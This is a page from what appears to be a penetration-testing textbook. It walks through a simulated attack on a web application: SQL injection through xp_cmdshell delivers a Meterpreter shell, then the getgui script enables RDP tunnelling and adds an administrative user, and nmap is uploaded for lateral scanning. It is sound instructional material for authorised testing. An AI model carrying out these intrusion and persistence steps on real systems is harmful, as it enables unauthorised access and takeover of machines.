Simulated Penetration Test
257
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...
. . . SNIP . . .
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
This should look familiar. We’ve essentially attacked the web application
through Fast-Track and exploited it via SQL injection attacks. We used the
xp_cmdshell
stored procedure and the binary-to-hex conversion technique to
present a full-fledged Meterpreter shell.
Post Exploitation
At this point, we should have a Meterpreter console running in the back-
ground within
msfconsole
, so we can begin to scan the target’s subnet for other
live systems. To do this, we’ll upload
nmap
to the target and run it from the
Windows machine.
First, download
nmap
from
insecure.org
in an executable format and save
it locally. We’ll be uploading this to our target. Next, we’ll connect to the
target via Microsoft’s Remote Desktop Protocol (RDP), a built-in graphical
remote administration protocol that lets you interact with the Windows
Desktop as if you were sitting in front of the remote machine. After we’re
connected with our Meterpreter session, we’ll use the
getgui
Meterpreter script
to tunnel RDP back out to us over port 8080 and add a new administrative
user to the system.
We enter
rdesktop localhost:8080
from Back|Track’s command line, so
we can log into the system with the newly created user account. We then use
Meterpreter to upload
nmap
to the target. Our goal is to install
nmap
on the
compromised Windows target and use the system as a staging ground for
further attacks. Conversely you could use
scanner/portscan/syn
and
scanner/
portscan/tcp
to port scan directly through Metasploit. The choice is a matter
of personal preference and needs.
meterpreter >
run getgui -e -f 8080
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter >
shell